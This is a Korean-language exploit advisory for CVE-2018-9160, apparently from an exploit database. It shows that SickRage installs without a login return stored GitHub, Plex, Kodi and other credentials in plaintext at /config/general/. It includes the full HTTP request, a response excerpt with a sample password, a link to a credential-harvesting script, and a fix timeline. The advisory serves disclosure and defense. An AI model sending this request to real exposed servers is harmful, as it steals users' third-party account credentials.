
CVE-2018-9160
Exploit Title: SickRage HTTP 응답 내 평문 자격 증명
Date: 2018-04-01
Exploit Author: Sven Fassbender
Contact: https://twitter.com/mezdanak
Vendor Homepage: https://sickrage.github.io
Software Link: https://github.com/SickRage/SickRage
Version: < v2018.03.09-1
CVE : CVE-2018-9160
Category: webapps
"SickRage는 TV 프로그램을 위한 자동 비디오 라이브러리 관리자입니다.
좋아하는 프로그램의 새 에피소드를 감시하고, 에피소드가 게시되면 마법을 부립니다:
자동으로 토렌트/nzb 검색, 다운로드, 원하는 화질로 처리합니다." -- https://sickrage.github.io 에서 발췌
SickRage는 HTTP 응답에 GitHub, AniDB, Kodi, Plex 등의 평문 자격 증명을 반환합니다.
전제 조건은 사용자가 SickRage 설치에 사용자 이름과 비밀번호를 설정하지 않은 경우입니다. (기본값, 강제되지 않음)
HTTP 요청:
GET /config/general/ HTTP/1.1
Host: 192.168.1.13:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.13:8081/config/backuprestore/
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
HTTP 응답:
HTTP/1.1 200 OK
Content-Length: 113397
Vary: Accept-Encoding
Server: TornadoServer/4.5.1
Etag: "e5c29fe99abcd01731bec1afec0e618195f1ae37"
Date: Fri, 02 Mar 2018 10:47:51 GMT
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
<html lang="nl_NL">
<head>
[...]
<input type="text" name="git_username" id="git_username" value="[email protected]" class="form-control input-sm input300" autocapitalize="off" autocomplete="no" />
[...]
<input type="password" name="git_password" id="git_password" value="supersecretpassword" class="form-control input-sm input300" autocomplete="no" autocapitalize="off" />
[...]
</div>
</body>
</html>
https://github.com/mechanico/sickrageWTF/blob/master/get_github_creds_sickrage.py
[2018-03-07] 취약점 발견
[2018-03-08] 공급업체에 연락
[2018-03-08] 공급업체 답변
[2018-03-09] 취약점 수정됨. (https://github.com/SickRage/SickRage/compare/v2018.02.26-2...v2018.03.09-1)
SickRage 설치를 v2018.03.09-1 이상으로 업데이트하십시오.
적절한 사용자 인증 정보로 웹 애플리케이션 접근을 보호하십시오.